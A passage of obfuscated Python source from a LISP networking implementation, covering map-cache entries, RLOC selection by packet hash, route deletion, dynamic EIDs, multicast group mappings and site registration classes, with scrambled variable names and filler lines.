self . map_replies_sent = 0
self . mapping_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . use_mr_name = "all"
self . use_ms_name = "all"
self . stats = lisp_stats ( )
self . dynamic_eids = None
self . checkpoint_entry = False
self . secondary_iid = None
self . signature_eid = False
self . gleaned = False
self . recent_sources = { }
self . last_multicast_map_request = 0
self . subscribed_eid = None
self . subscribed_group = None
if 55 - 55: iII111i
if 37 - 37: oO0o / o0oOOo0O0Ooo + I11i * OoO0O00 * o0oOOo0O0Ooo
def print_mapping ( self , eid_indent , rloc_indent ) :
i1 = lisp_print_elapsed ( self . uptime )
oo0oOooo0O = "" if self . group . is_null ( ) else ", group {}" . format ( self . group . print_prefix ( ) )
if 33 - 33: I1Ii111
lprint ( "{}eid {}{}, uptime {}, {} rlocs:" . format ( eid_indent ,
green ( self . eid . print_prefix ( ) , False ) , oo0oOooo0O , i1 ,
len ( self . rloc_set ) ) )
for iIIiI11 in self . rloc_set : iIIiI11 . print_rloc ( rloc_indent )
if 97 - 97: Ii1I / iII111i - ooOoO0o + IiII * OoOoOO00 - OOooOOo
if 43 - 43: oO0o / II111iiii - iII111i / oO0o
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 98 - 98: OoOoOO00 / OOooOOo
if 31 - 31: II111iiii % I11i - I11i
def print_ttl ( self ) :
O0O00O = self . map_cache_ttl
if ( O0O00O == None ) : return ( "forever" )
if 17 - 17: iII111i . IiII + OOooOOo % I1Ii111 % i11iIiiIii
if ( O0O00O >= 3600 ) :
if ( ( O0O00O % 3600 ) == 0 ) :
O0O00O = str ( old_div ( O0O00O , 3600 ) ) + " hours"
else :
O0O00O = str ( O0O00O * 60 ) + " mins"
if 100 - 100: i11iIiiIii - O0 . OoO0O00 / O0 - Ii1I - IiII
elif ( O0O00O >= 60 ) :
if ( ( O0O00O % 60 ) == 0 ) :
O0O00O = str ( old_div ( O0O00O , 60 ) ) + " mins"
else :
O0O00O = str ( O0O00O ) + " secs"
if 72 - 72: Ii1I % O0 + II111iiii . i11iIiiIii
else :
O0O00O = str ( O0O00O ) + " secs"
if 66 - 66: II111iiii % I1IiiI
return ( O0O00O )
if 88 - 88: iIii1I11I1II1 * iIii1I11I1II1 + I1Ii111 * OOooOOo . I1IiiI
if 96 - 96: I1ii11iIi11i
def refresh ( self ) :
if ( self . group . is_null ( ) ) : return ( self . refresh_unicast ( ) )
return ( self . refresh_multicast ( ) )
if 37 - 37: OoO0O00 % o0oOOo0O0Ooo * O0 * O0 + iII111i
if 18 - 18: i11iIiiIii . o0oOOo0O0Ooo - OOooOOo % oO0o * Ii1I / I1IiiI
def refresh_unicast ( self ) :
return ( self . is_active ( ) and self . has_ttl_elapsed ( ) and
self . gleaned == False )
if 46 - 46: o0oOOo0O0Ooo . ooOoO0o / Ii1I
if 97 - 97: Ii1I . Oo0Ooo - O0 - I1Ii111 . i1IIi
def refresh_multicast ( self ) :
if 47 - 47: IiII * ooOoO0o - i1IIi % OoOoOO00 * i11iIiiIii . OoooooooOO
if 84 - 84: OoOoOO00 / IiII - i1IIi - I1IiiI * OOooOOo
if 35 - 35: II111iiii
if 28 - 28: I1Ii111 + IiII + I1ii11iIi11i . Ii1I
if 82 - 82: ooOoO0o - ooOoO0o . Ii1I . i11iIiiIii % Ii1I + OOooOOo
i1i111Iiiiiii = int ( ( time . time ( ) - self . uptime ) % self . map_cache_ttl )
IIiI1I1i = ( i1i111Iiiiiii in [ 0 , 1 , 2 ] )
if ( IIiI1I1i == False ) : return ( False )
if 37 - 37: OoO0O00 * OoO0O00 % iIii1I11I1II1 % II111iiii + Oo0Ooo
if 4 - 4: i11iIiiIii + OoOoOO00 - Ii1I * i1IIi * i11iIiiIii
if 46 - 46: IiII . iII111i % OoooooooOO % IiII + Ii1I - OoooooooOO
if 23 - 23: O0 - iII111i
IiIiI1I1Ii = ( ( time . time ( ) - self . last_multicast_map_request ) <= 2 )
if ( IiIiI1I1Ii ) : return ( False )
if 51 - 51: i1IIi % oO0o . iII111i % i1IIi
self . last_multicast_map_request = lisp_get_timestamp ( )
return ( True )
if 74 - 74: O0 / ooOoO0o - OOooOOo / OoO0O00 % I11i * II111iiii
if 42 - 42: I1IiiI * Ii1I
def has_ttl_elapsed ( self ) :
if ( self . map_cache_ttl == None ) : return ( False )
i1i111Iiiiiii = time . time ( ) - self . last_refresh_time
if ( i1i111Iiiiiii >= self . map_cache_ttl ) : return ( True )
if 95 - 95: OoO0O00 * i1IIi
if 43 - 43: Oo0Ooo % iII111i % O0 + i1IIi
if 45 - 45: ooOoO0o
if 89 - 89: iIii1I11I1II1 . I1Ii111
if 43 - 43: Oo0Ooo + o0oOOo0O0Ooo % o0oOOo0O0Ooo % I1ii11iIi11i / iIii1I11I1II1 . I1ii11iIi11i
O0ooo = self . map_cache_ttl - ( old_div ( self . map_cache_ttl , 10 ) )
if ( i1i111Iiiiiii >= O0ooo ) : return ( True )
return ( False )
if 33 - 33: Ii1I
if 95 - 95: OoooooooOO + OoO0O00 * ooOoO0o
def is_active ( self ) :
if ( self . stats . last_increment == None ) : return ( False )
i1i111Iiiiiii = time . time ( ) - self . stats . last_increment
return ( i1i111Iiiiiii <= 60 )
if 40 - 40: I1IiiI / OOooOOo * Ii1I
if 98 - 98: I1IiiI
def match_eid_tuple ( self , db ) :
if ( self . eid . is_exact_match ( db . eid ) == False ) : return ( False )
if ( self . group . is_exact_match ( db . group ) == False ) : return ( False )
return ( True )
if 4 - 4: I1IiiI % O0 / Oo0Ooo / O0
if 90 - 90: ooOoO0o - O0 . IiII - O0 . iIii1I11I1II1
def sort_rloc_set ( self ) :
self . rloc_set . sort ( key = operator . attrgetter ( 'rloc.address' ) )
if 42 - 42: I1ii11iIi11i
if 51 - 51: iII111i % i11iIiiIii . OoO0O00 . IiII - OoOoOO00 * i1IIi
def delete_rlocs_from_rloc_probe_list ( self ) :
for iIIiI11 in self . best_rloc_set :
iIIiI11 . delete_from_rloc_probe_list ( self . eid , self . group )
if 14 - 14: I1ii11iIi11i . OoO0O00
if 26 - 26: iII111i / ooOoO0o / Oo0Ooo / Oo0Ooo . I1ii11iIi11i * OOooOOo
if 25 - 25: IiII % I1IiiI / O0 % OOooOOo - OoooooooOO
def build_best_rloc_set ( self ) :
ii1i111 = self . best_rloc_set
self . best_rloc_set = [ ]
if ( self . rloc_set == None ) : return
if 58 - 58: Ii1I * oO0o . I1ii11iIi11i % I1IiiI - ooOoO0o
if 100 - 100: i11iIiiIii / O0 . Oo0Ooo + i1IIi . OoOoOO00
if 76 - 76: OoooooooOO - O0
if 17 - 17: Oo0Ooo % I1Ii111 . oO0o - O0
iiiIIi1Iii = 256
for iIIiI11 in self . rloc_set :
if ( iIIiI11 . up_state ( ) ) : iiiIIi1Iii = min ( iIIiI11 . priority , iiiIIi1Iii )
if 39 - 39: iII111i - I1ii11iIi11i % ooOoO0o - OoOoOO00 + OoOoOO00
if 97 - 97: I11i * I1Ii111 * oO0o
if 3 - 3: iIii1I11I1II1 / ooOoO0o + ooOoO0o + I11i
if 20 - 20: OOooOOo - i1IIi / i11iIiiIii
if 60 - 60: I11i * I11i + Oo0Ooo . IiII / iII111i % OoooooooOO
if 35 - 35: O0 . Oo0Ooo / Oo0Ooo / Ii1I / i1IIi * I11i
if 93 - 93: O0 + IiII
if 91 - 91: iIii1I11I1II1
if 66 - 66: i1IIi . ooOoO0o
if 84 - 84: O0 % ooOoO0o / I1Ii111
for iIIiI11 in self . rloc_set :
if ( iIIiI11 . priority <= iiiIIi1Iii ) :
if ( iIIiI11 . unreach_state ( ) and iIIiI11 . last_rloc_probe == None ) :
iIIiI11 . last_rloc_probe = lisp_get_timestamp ( )
if 75 - 75: I11i - iII111i . O0
self . best_rloc_set . append ( iIIiI11 )
if 52 - 52: I1ii11iIi11i
if 22 - 22: I1ii11iIi11i - i1IIi / OOooOOo . o0oOOo0O0Ooo . oO0o
if 9 - 9: ooOoO0o - I1Ii111 + IiII . iII111i
if 52 - 52: I1Ii111 + oO0o % II111iiii - i1IIi
if 32 - 32: I1Ii111 % ooOoO0o + I1Ii111 / I1ii11iIi11i - o0oOOo0O0Ooo + ooOoO0o
if 46 - 46: OoO0O00 % OoO0O00 . O0 + II111iiii
if 42 - 42: OOooOOo * I1Ii111
if 53 - 53: II111iiii % OOooOOo / I1ii11iIi11i * OoOoOO00 % I1ii11iIi11i * iII111i
for iIIiI11 in ii1i111 :
if ( iIIiI11 . priority < iiiIIi1Iii ) : continue
iIIiI11 . delete_from_rloc_probe_list ( self . eid , self . group )
if 91 - 91: iII111i . OoooooooOO
for iIIiI11 in self . best_rloc_set :
if ( iIIiI11 . rloc . is_null ( ) ) : continue
iIIiI11 . add_to_rloc_probe_list ( self . eid , self . group )
if 90 - 90: i11iIiiIii - I1IiiI
if 39 - 39: iII111i % OoooooooOO % Ii1I % I1IiiI
if 63 - 63: OoO0O00 - I1Ii111 - II111iiii
def select_rloc ( self , lisp_packet , ipc_socket ) :
Oo00oo = lisp_packet . packet
OoOooO00 = lisp_packet . inner_version
i1iIii = len ( self . best_rloc_set )
if ( i1iIii == 0 ) :
self . stats . increment ( len ( Oo00oo ) )
return ( [ None , None , None , self . action , None , None ] )
if 66 - 66: i1IIi + I1IiiI
if 45 - 45: I1Ii111 . iII111i + OoO0O00 - O0
oO00o00oo = 4 if lisp_load_split_pings else 0
II1Iii1iI = lisp_packet . hash_ports ( )
if ( OoOooO00 == 4 ) :
for iIi1iIIIiIiI in range ( 8 + oO00o00oo ) :
II1Iii1iI = II1Iii1iI ^ struct . unpack ( "B" , Oo00oo [ iIi1iIIIiIiI + 12 : iIi1iIIIiIiI + 13 ] ) [ 0 ]
if 12 - 12: OoooooooOO . OOooOOo
elif ( OoOooO00 == 6 ) :
for iIi1iIIIiIiI in range ( 0 , 32 + oO00o00oo , 4 ) :
II1Iii1iI = II1Iii1iI ^ struct . unpack ( "I" , Oo00oo [ iIi1iIIIiIiI + 8 : iIi1iIIIiIiI + 12 ] ) [ 0 ]
if 83 - 83: I1ii11iIi11i * I1Ii111 . o0oOOo0O0Ooo
II1Iii1iI = ( II1Iii1iI >> 16 ) + ( II1Iii1iI & 0xffff )
II1Iii1iI = ( II1Iii1iI >> 8 ) + ( II1Iii1iI & 0xff )
else :
for iIi1iIIIiIiI in range ( 0 , 12 + oO00o00oo , 4 ) :
II1Iii1iI = II1Iii1iI ^ struct . unpack ( "I" , Oo00oo [ iIi1iIIIiIiI : iIi1iIIIiIiI + 4 ] ) [ 0 ]
if 86 - 86: I1ii11iIi11i * iII111i
if 37 - 37: i1IIi / I11i . iII111i - II111iiii
if 66 - 66: Ii1I + OoOoOO00 - I11i / o0oOOo0O0Ooo + iIii1I11I1II1
if ( lisp_data_plane_logging ) :
O0O0OO0o0 = [ ]
for iiiI1I in self . best_rloc_set :
if ( iiiI1I . rloc . is_null ( ) ) : continue
O0O0OO0o0 . append ( [ iiiI1I . rloc . print_address_no_iid ( ) , iiiI1I . print_state ( ) ] )
if 23 - 23: IiII - OoOoOO00 . OoO0O00
dprint ( "Packet hash {}, index {}, best-rloc-list: {}" . format ( hex ( II1Iii1iI ) , II1Iii1iI % i1iIii , red ( str ( O0O0OO0o0 ) , False ) ) )
if 81 - 81: I1Ii111 / I1ii11iIi11i
if 69 - 69: I1IiiI
if 79 - 79: ooOoO0o
if 83 - 83: I1Ii111 % II111iiii
if 89 - 89: Ii1I . I11i
if 98 - 98: I1Ii111 / O0 % ooOoO0o
iIIiI11 = self . best_rloc_set [ II1Iii1iI % i1iIii ]
if 36 - 36: iIii1I11I1II1 . iII111i * I1IiiI . I1IiiI - IiII
if 39 - 39: O0 / ooOoO0o + I11i - OoOoOO00 * o0oOOo0O0Ooo - OoO0O00
if 97 - 97: i11iIiiIii / O0 % OoO0O00
if 88 - 88: i1IIi . I1IiiI
if 8 - 8: I1ii11iIi11i . OoO0O00 % o0oOOo0O0Ooo / O0
I111Ii1I1I1iI = lisp_get_echo_nonce ( iIIiI11 . rloc , None )
if ( I111Ii1I1I1iI ) :
I111Ii1I1I1iI . change_state ( iIIiI11 )
if ( iIIiI11 . no_echoed_nonce_state ( ) ) :
I111Ii1I1I1iI . request_nonce_sent = None
if 51 - 51: oO0o + Ii1I * Ii1I * I1ii11iIi11i % I11i - I1ii11iIi11i
if 15 - 15: i1IIi / OoO0O00 - Oo0Ooo
if 74 - 74: o0oOOo0O0Ooo % Ii1I - II111iiii / ooOoO0o
if 84 - 84: I1IiiI + OOooOOo
if 80 - 80: OOooOOo / OoOoOO00
if 93 - 93: OOooOOo
if ( iIIiI11 . up_state ( ) == False ) :
OooOooo = II1Iii1iI % i1iIii
OOOooo0OooOoO = ( OooOooo + 1 ) % i1iIii
while ( OOOooo0OooOoO != OooOooo ) :
iIIiI11 = self . best_rloc_set [ OOOooo0OooOoO ]
if ( iIIiI11 . up_state ( ) ) : break
OOOooo0OooOoO = ( OOOooo0OooOoO + 1 ) % i1iIii
if 36 - 36: iII111i % I1ii11iIi11i + OoOoOO00 - i11iIiiIii % II111iiii % I11i
if ( OOOooo0OooOoO == OooOooo ) :
self . build_best_rloc_set ( )
return ( [ None , None , None , None , None , None ] )
if 92 - 92: O0 * OoooooooOO + I1ii11iIi11i / IiII
if 97 - 97: o0oOOo0O0Ooo . Ii1I + I1Ii111
if 72 - 72: i11iIiiIii . iII111i . Ii1I * I1ii11iIi11i
if 49 - 49: OoOoOO00 - O0 % I11i - ooOoO0o * OOooOOo
if 58 - 58: OoooooooOO - OOooOOo * oO0o / Ii1I . IiII
if 50 - 50: IiII . OOooOOo + I1ii11iIi11i - OoooooooOO
iIIiI11 . stats . increment ( len ( Oo00oo ) )
if 2 - 2: o0oOOo0O0Ooo % ooOoO0o / O0 / i11iIiiIii
if 91 - 91: II111iiii * o0oOOo0O0Ooo
if 20 - 20: iIii1I11I1II1 % Oo0Ooo * OoOoOO00 % IiII
if 93 - 93: I11i * iIii1I11I1II1 * oO0o
if ( iIIiI11 . rle_name and iIIiI11 . rle == None ) :
if ( iIIiI11 . rle_name in lisp_rle_list ) :
iIIiI11 . rle = lisp_rle_list [ iIIiI11 . rle_name ]
if 74 - 74: I1IiiI
if 39 - 39: iII111i * IiII / iII111i * IiII % I1ii11iIi11i
if ( iIIiI11 . rle ) : return ( [ None , None , None , None , iIIiI11 . rle , None ] )
if 27 - 27: iIii1I11I1II1 . ooOoO0o
if 74 - 74: i1IIi % OoOoOO00
if 98 - 98: IiII * OOooOOo / O0 - I1Ii111 . I1Ii111 + OOooOOo
if 61 - 61: iII111i * Ii1I % Ii1I + I1IiiI
if ( iIIiI11 . elp and iIIiI11 . elp . use_elp_node ) :
return ( [ iIIiI11 . elp . use_elp_node . address , None , None , None , None ,
None ] )
if 23 - 23: oO0o + I1Ii111 / OoooooooOO / O0 + IiII
if 80 - 80: i11iIiiIii - OoooooooOO + II111iiii / i1IIi - oO0o
if 100 - 100: Ii1I
if 73 - 73: IiII - O0
if 54 - 54: OOooOOo
Ii1IIIIi = None if ( iIIiI11 . rloc . is_null ( ) ) else iIIiI11 . rloc
ooO0 = iIIiI11 . translated_port
oOoO0OooO0O = self . action if ( Ii1IIIIi == None ) else None
if 100 - 100: I11i . OOooOOo - II111iiii % I11i % iIii1I11I1II1
if 4 - 4: o0oOOo0O0Ooo . iII111i / O0
if 13 - 13: iII111i / IiII
if 28 - 28: iII111i
if 97 - 97: iIii1I11I1II1
o0Oo0o = None
if ( I111Ii1I1I1iI and I111Ii1I1I1iI . request_nonce_timeout ( ) == False ) :
o0Oo0o = I111Ii1I1I1iI . get_request_or_echo_nonce ( ipc_socket , Ii1IIIIi )
if 18 - 18: OOooOOo
if 87 - 87: O0 - i1IIi . I11i / Ii1I % iIii1I11I1II1
if 57 - 57: I11i . IiII / iIii1I11I1II1 - ooOoO0o
if 50 - 50: O0 / II111iiii
if 94 - 94: O0 + O0 % I1ii11iIi11i % i1IIi
return ( [ Ii1IIIIi , ooO0 , o0Oo0o , oOoO0OooO0O , None , iIIiI11 ] )
if 15 - 15: I1IiiI
if 48 - 48: Ii1I * IiII % O0 - II111iiii
def do_rloc_sets_match ( self , rloc_address_set ) :
if ( len ( self . rloc_set ) != len ( rloc_address_set ) ) : return ( False )
if 66 - 66: iIii1I11I1II1 / OOooOOo
if 65 - 65: IiII . oO0o + O0 - i11iIiiIii + iIii1I11I1II1
if 82 - 82: iIii1I11I1II1 * iII111i + iIii1I11I1II1 / OoO0O00 + O0
if 67 - 67: I1Ii111
if 94 - 94: I1Ii111 % iIii1I11I1II1 - II111iiii . ooOoO0o + i11iIiiIii - i11iIiiIii
for OOOoOoo in self . rloc_set :
for iIIiI11 in rloc_address_set :
if ( iIIiI11 . is_exact_match ( OOOoOoo . rloc ) == False ) : continue
iIIiI11 = None
break
if 55 - 55: OoooooooOO % iIii1I11I1II1 % I1ii11iIi11i % i1IIi
if ( iIIiI11 == rloc_address_set [ - 1 ] ) : return ( False )
if 46 - 46: I11i - ooOoO0o . I1IiiI
return ( True )
if 36 - 36: I11i + OoO0O00 * O0 * OoOoOO00 * iII111i
if 90 - 90: i11iIiiIii / i1IIi
def get_rloc ( self , rloc ) :
for OOOoOoo in self . rloc_set :
iiiI1I = OOOoOoo . rloc
if ( rloc . is_exact_match ( iiiI1I ) ) : return ( OOOoOoo )
if 35 - 35: Ii1I . I11i / oO0o / OoOoOO00
return ( None )
if 5 - 5: I1ii11iIi11i . o0oOOo0O0Ooo * iII111i * I1ii11iIi11i % I1Ii111
if 83 - 83: iIii1I11I1II1 * o0oOOo0O0Ooo % i11iIiiIii + OoO0O00 . O0
def get_rloc_by_interface ( self , interface ) :
for OOOoOoo in self . rloc_set :
if ( OOOoOoo . interface == interface ) : return ( OOOoOoo )
if 87 - 87: II111iiii - iIii1I11I1II1 % I11i % I1IiiI . o0oOOo0O0Ooo
return ( None )
if 52 - 52: i11iIiiIii . oO0o / OoooooooOO - OoO0O00
if 7 - 7: I1IiiI * I1IiiI % OOooOOo % iIii1I11I1II1 * OoO0O00 . o0oOOo0O0Ooo
def add_db ( self ) :
if ( self . group . is_null ( ) ) :
lisp_db_for_lookups . add_cache ( self . eid , self )
else :
OoO0oO = lisp_db_for_lookups . lookup_cache ( self . group , True )
if ( OoO0oO == None ) :
OoO0oO = lisp_mapping ( self . group , self . group , [ ] )
lisp_db_for_lookups . add_cache ( self . group , OoO0oO )
if 32 - 32: ooOoO0o / i1IIi
OoO0oO . add_source_entry ( self )
if 55 - 55: oO0o . OoOoOO00 + OoooooooOO - ooOoO0o . OoooooooOO
if 77 - 77: I1IiiI
if 16 - 16: I1IiiI + ooOoO0o - O0 / o0oOOo0O0Ooo
def add_cache ( self , do_ipc = True ) :
if ( self . group . is_null ( ) ) :
lisp_map_cache . add_cache ( self . eid , self )
if ( lisp_program_hardware ) : lisp_program_vxlan_hardware ( self )
else :
I11iiI1III = lisp_map_cache . lookup_cache ( self . group , True )
if ( I11iiI1III == None ) :
I11iiI1III = lisp_mapping ( self . group , self . group , [ ] )
I11iiI1III . eid . copy_address ( self . group )
I11iiI1III . group . copy_address ( self . group )
lisp_map_cache . add_cache ( self . group , I11iiI1III )
if 36 - 36: Oo0Ooo - OoOoOO00 - II111iiii
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( I11iiI1III . group )
I11iiI1III . add_source_entry ( self )
if 25 - 25: i11iIiiIii + II111iiii * OOooOOo % OOooOOo
if ( do_ipc ) : lisp_write_ipc_map_cache ( True , self )
if 87 - 87: I11i % Ii1I % Oo0Ooo . II111iiii / oO0o
if 19 - 19: O0 . OOooOOo + I1Ii111 * I1ii11iIi11i
def delete_cache ( self ) :
self . delete_rlocs_from_rloc_probe_list ( )
lisp_write_ipc_map_cache ( False , self )
if 91 - 91: o0oOOo0O0Ooo / oO0o . o0oOOo0O0Ooo + IiII + ooOoO0o . I1Ii111
if ( self . group . is_null ( ) ) :
lisp_map_cache . delete_cache ( self . eid )
if ( lisp_program_hardware ) :
Oo0OoOI1I11iII1I1i = self . eid . print_prefix_no_iid ( )
os . system ( "ip route delete {}" . format ( Oo0OoOI1I11iII1I1i ) )
if 73 - 73: Ii1I * OoooooooOO + iIii1I11I1II1
else :
I11iiI1III = lisp_map_cache . lookup_cache ( self . group , True )
if ( I11iiI1III == None ) : return
if 91 - 91: Oo0Ooo * iIii1I11I1II1 / ooOoO0o . Oo0Ooo
O0Ooo0 = I11iiI1III . lookup_source_cache ( self . eid , True )
if ( O0Ooo0 == None ) : return
if 83 - 83: I1ii11iIi11i / O0 * II111iiii + IiII + Oo0Ooo
I11iiI1III . source_cache . delete_cache ( self . eid )
if ( I11iiI1III . source_cache . cache_size ( ) == 0 ) :
lisp_map_cache . delete_cache ( self . group )
if 99 - 99: II111iiii + O0
if 94 - 94: ooOoO0o * ooOoO0o + o0oOOo0O0Ooo . iII111i % iIii1I11I1II1 + Ii1I
if 88 - 88: Oo0Ooo . iII111i
if 89 - 89: OOooOOo + I1Ii111 % i11iIiiIii + Oo0Ooo / Oo0Ooo + OoO0O00
def add_source_entry ( self , source_mc ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_mc . eid , source_mc )
if 9 - 9: OoOoOO00 % i1IIi + IiII
if 19 - 19: I1Ii111 - II111iiii / I1Ii111 + I1IiiI - OoooooooOO + o0oOOo0O0Ooo
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 100 - 100: OoO0O00 / OoOoOO00 / OOooOOo / OoO0O00
if 95 - 95: ooOoO0o
def dynamic_eid_configured ( self ) :
return ( self . dynamic_eids != None )
if 95 - 95: Ii1I + i1IIi . I1IiiI % I1Ii111 / Ii1I * O0
if 68 - 68: I1Ii111 - IiII - oO0o - Oo0Ooo - o0oOOo0O0Ooo
def star_secondary_iid ( self , prefix ) :
if ( self . secondary_iid == None ) : return ( prefix )
oooo = "," + str ( self . secondary_iid )
return ( prefix . replace ( oooo , oooo + "*" ) )
if 32 - 32: OoOoOO00 % i11iIiiIii
if 53 - 53: I1Ii111 * Ii1I / IiII . i1IIi * II111iiii / o0oOOo0O0Ooo
def increment_decap_stats ( self , packet ) :
ooO0 = packet . udp_dport
if ( ooO0 == LISP_DATA_PORT ) :
iIIiI11 = self . get_rloc ( packet . outer_dest )
else :
if 44 - 44: I1Ii111 + ooOoO0o
if 15 - 15: I11i + OoO0O00 + OoOoOO00
if 100 - 100: I1Ii111
if 78 - 78: OoOoOO00
for iIIiI11 in self . rloc_set :
if ( iIIiI11 . translated_port != 0 ) : break
if 16 - 16: I1Ii111 % OoO0O00 - OoO0O00 % OoOoOO00 * OoO0O00
if 36 - 36: OoOoOO00 * II111iiii . OoooooooOO * I11i . I11i
if ( iIIiI11 != None ) : iIIiI11 . stats . increment ( len ( packet . packet ) )
self . stats . increment ( len ( packet . packet ) )
if 13 - 13: I1ii11iIi11i * II111iiii
if 93 - 93: OOooOOo / O0 - o0oOOo0O0Ooo + OoO0O00 * I1IiiI
def rtrs_in_rloc_set ( self ) :
for iIIiI11 in self . rloc_set :
if ( iIIiI11 . is_rtr ( ) ) : return ( True )
if 53 - 53: I1ii11iIi11i
return ( False )
if 91 - 91: o0oOOo0O0Ooo - I1ii11iIi11i . i1IIi
if 64 - 64: ooOoO0o
def add_recent_source ( self , source ) :
self . recent_sources [ source . print_address ( ) ] = lisp_get_timestamp ( )
if 23 - 23: Oo0Ooo . OoO0O00
if 49 - 49: oO0o % i11iIiiIii * Ii1I
if 9 - 9: Oo0Ooo - OoO0O00 + ooOoO0o / o0oOOo0O0Ooo
class lisp_dynamic_eid ( object ) :
def __init__ ( self ) :
self . dynamic_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . uptime = lisp_get_timestamp ( )
self . interface = None
self . last_packet = None
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
if 61 - 61: O0 - i11iIiiIii * o0oOOo0O0Ooo
if 92 - 92: Oo0Ooo + OOooOOo - i11iIiiIii
def get_timeout ( self , interface ) :
try :
IiIII1i1IiI = lisp_myinterfaces [ interface ]
self . timeout = IiIII1i1IiI . dynamic_eid_timeout
except :
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
if 20 - 20: iII111i . I1Ii111 % o0oOOo0O0Ooo / I1ii11iIi11i . iII111i . OoOoOO00
if 27 - 27: I11i - o0oOOo0O0Ooo + Ii1I * OoooooooOO * i1IIi % OoOoOO00
if 83 - 83: iIii1I11I1II1 - i1IIi - Ii1I % iII111i
if 69 - 69: I1Ii111 * oO0o * I1IiiI
class lisp_group_mapping ( object ) :
def __init__ ( self , group_name , ms_name , group_prefix , sources , rle_addr ) :
self . group_name = group_name
self . group_prefix = group_prefix
self . use_ms_name = ms_name
self . sources = sources
self . rle_address = rle_addr
if 74 - 74: O0 / I11i . Oo0Ooo / I11i % OoO0O00 % o0oOOo0O0Ooo
if 83 - 83: OoO0O00 - i11iIiiIii + iIii1I11I1II1
def add_group ( self ) :
lisp_group_mapping_list [ self . group_name ] = self
if 52 - 52: OoooooooOO
if 44 - 44: O0 / OoooooooOO + ooOoO0o * I1ii11iIi11i
if 36 - 36: I1ii11iIi11i / OoO0O00 - oO0o % O0
if 12 - 12: i1IIi * ooOoO0o / oO0o + I1IiiI / OoooooooOO
if 86 - 86: Oo0Ooo / OoO0O00
if 78 - 78: I1IiiI * I1IiiI
if 13 - 13: oO0o
if 43 - 43: oO0o / Ii1I % OOooOOo
if 45 - 45: II111iiii
if 41 - 41: Ii1I / OOooOOo * Oo0Ooo . O0 - i11iIiiIii
def lisp_is_group_more_specific ( group_str , group_mapping ) :
oooo = group_mapping . group_prefix . instance_id
OOOoOo0o0Ooo = group_mapping . group_prefix . mask_len
oo0oOooo0O = lisp_address ( LISP_AFI_IPV4 , group_str , 32 , oooo )
if ( oo0oOooo0O . is_more_specific ( group_mapping . group_prefix ) ) : return ( OOOoOo0o0Ooo )
return ( - 1 )
if 77 - 77: o0oOOo0O0Ooo + I1IiiI + I1Ii111 / I1ii11iIi11i * i1IIi
if 37 - 37: O0 + iIii1I11I1II1 % IiII * oO0o
if 43 - 43: OOooOOo . O0
if 76 - 76: OOooOOo * OoooooooOO / IiII . OoO0O00 + II111iiii
if 23 - 23: OoO0O00 - OoooooooOO * I11i . iIii1I11I1II1 / o0oOOo0O0Ooo + oO0o
if 74 - 74: II111iiii / I1IiiI * O0 * OoO0O00 . I11i
if 74 - 74: O0 . i1IIi / I1ii11iIi11i + o0oOOo0O0Ooo
def lisp_lookup_group ( group ) :
O0O0OO0o0 = None
for I1I11I1IIi in list ( lisp_group_mapping_list . values ( ) ) :
OOOoOo0o0Ooo = lisp_is_group_more_specific ( group , I1I11I1IIi )
if ( OOOoOo0o0Ooo == - 1 ) : continue
if ( O0O0OO0o0 == None or OOOoOo0o0Ooo > O0O0OO0o0 . group_prefix . mask_len ) : O0O0OO0o0 = I1I11I1IIi
if 3 - 3: i1IIi + OoOoOO00 - OoOoOO00
return ( O0O0OO0o0 )
if 85 - 85: o0oOOo0O0Ooo / o0oOOo0O0Ooo + Oo0Ooo * II111iiii + Ii1I * Ii1I
if 26 - 26: o0oOOo0O0Ooo + oO0o * i11iIiiIii / II111iiii
lisp_site_flags = {
"P" : "ETR is {}Requesting Map-Server to Proxy Map-Reply" ,
"S" : "ETR is {}LISP-SEC capable" ,
"I" : "xTR-ID and site-ID are {}included in Map-Register" ,
"T" : "Use Map-Register TTL field to timeout registration is {}set" ,
"R" : "Merging registrations are {}requested" ,
"M" : "ETR is {}a LISP Mobile-Node" ,
"N" : "ETR is {}requesting Map-Notify messages from Map-Server"
}
if 86 - 86: Ii1I
class lisp_site ( object ) :
def __init__ ( self ) :
self . site_name = ""
self . description = ""
self . shutdown = False
self . auth_sha1_or_sha2 = False
self . auth_key = { }
self . encryption_key = None
self . allowed_prefixes = { }
self . allowed_prefixes_sorted = [ ]
self . allowed_rlocs = { }
self . map_notifies_sent = 0
self . map_notify_acks_received = 0
if 69 - 69: oO0o % o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 1 - 1: Ii1I
if 43 - 43: o0oOOo0O0Ooo
class lisp_site_eid ( object ) :
def __init__ ( self , site ) :
self . site = site
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . first_registered = 0
self . last_registered = 0
self . last_registerer = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self . registered = False
self . registered_rlocs = [ ]
self . auth_sha1_or_sha2 = False
self . individual_registrations = { }
self . map_registers_received = 0
self . proxy_reply_requested = False
self . force_proxy_reply = False
self . force_nat_proxy_reply = False
self . force_ttl = None
self . pitr_proxy_reply_drop = False
self . proxy_reply_action = ""
self . lisp_sec_present = False
self . map_notify_requested = False
self . mobile_node_requested = False
self . echo_nonce_capable = False
self . use_register_ttl_requested = False
self . merge_register_requested = False
self . xtr_id_present = False
self . xtr_id = 0
self . site_id = 0
self . accept_more_specifics = False
self . parent_for_more_specifics = None
self . dynamic = False
self . more_specific_registrations = [ ]
self . source_cache = None
self . inconsistent_registration = False
self . policy = None
self . require_signature = False
self . encrypt_json = False
if 78 - 78: I1Ii111 % i1IIi * I11i
if 59 - 59: OoOoOO00 % OoO0O00 % i11iIiiIii . II111iiii % I1ii11iIi11i + i1IIi
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 99 - 99: I11i + IiII * I1Ii111 - OOooOOo - i1IIi
